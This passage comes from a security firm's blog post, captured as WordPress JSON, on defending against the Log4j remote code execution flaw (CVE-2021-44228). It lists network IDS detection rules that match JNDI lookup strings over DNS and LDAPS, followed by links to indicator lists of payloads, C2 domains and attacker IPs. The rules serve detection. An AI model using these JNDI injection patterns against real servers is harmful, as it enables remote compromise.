nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034653; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert tcp any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (tcp dns)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|dns|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034654; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert http any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (http dns)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|dns|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034655; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert udp any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (udp ldaps)<\/strong> (CVE-2021-44228)\"; content:\"|24 7b|jndi|3a|ldaps|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034656; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, 
former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert tcp any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|ldaps|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034657; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert http any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (http ldaps)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|ldaps|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034658; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>ATTACK PAYLOAD<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/gist.github.com\/nathanqthai\/01808c569903f41a52e7e7b575caa890\">https:\/\/gist.github.com\/nathanqthai\/01808c569903f41a52e7e7b575caa890<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>C2 DOMAIN NAME<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/gist.github.com\/superducktoes\/9b742f7b44c71b4a0d19790228ce85d8\">https:\/\/gist.github.com\/superducktoes\/9b742f7b44c71b4a0d19790228ce85d8<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>ATTACK IP<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><a 
href=\"https:\/\/gist.github.com\/gnremy\/c546c7911d5f876f263309d7161a7217\">https:\/\/gist.github.com\/gnremy\/c546c7911d5f876f263309d7161a7217<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"has-text-align-center wp-block-paragraph\"><strong><a href=\"https:\/\/fortgale.com\/en\/services\/\">Learn about Fortgale services<\/a><\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center wp-block-paragraph\"><strong><a href=\"https:\/\/fortgale.com\/en\/contact\/\">Contact us<\/a><\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>During the first weeks of December 2021 we observed attacks targeting the Apache Log4j library. On 2021-12-12, an official security advisory disclosed a critical Remote Command Execution vulnerability \u2014 CVE-2021-44228 (T1190 \u2014 Exploit Public-Facing Application). Any vulnerable system exposed to the public network is to be considered compromised given the volume of mass-exploitation activity observed &#8230; <a title=\"Log4j \u2014 how to protect your systems (CVE-2021-44228)\" class=\"read-more\" href=\"https:\/\/fortgale.com\/blog\/emerging-threats\/log4j-how-to-protect-your-systems-cve-2021-44228\/\" aria-label=\"Read more about Log4j \u2014 how to protect your systems (CVE-2021-44228)\">Read 
more<\/a><\/p>\n","protected":false},"author":7,"featured_media":4190,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[1545,1547,1549,1551,1495],"class_list":["post-4189","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-emerging-threats","tag-apache-it","tag-cve-2021-44228-it","tag-log4j-it","tag-rce-it","tag-vulnerability-it"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4189","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=4189"}],"version-history":[{"count":32,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4189\/revisions"}],"predecessor-version":[{"id":9817,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4189\/revisions\/9817"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media\/4190"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=4189"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=4189"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=4189"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}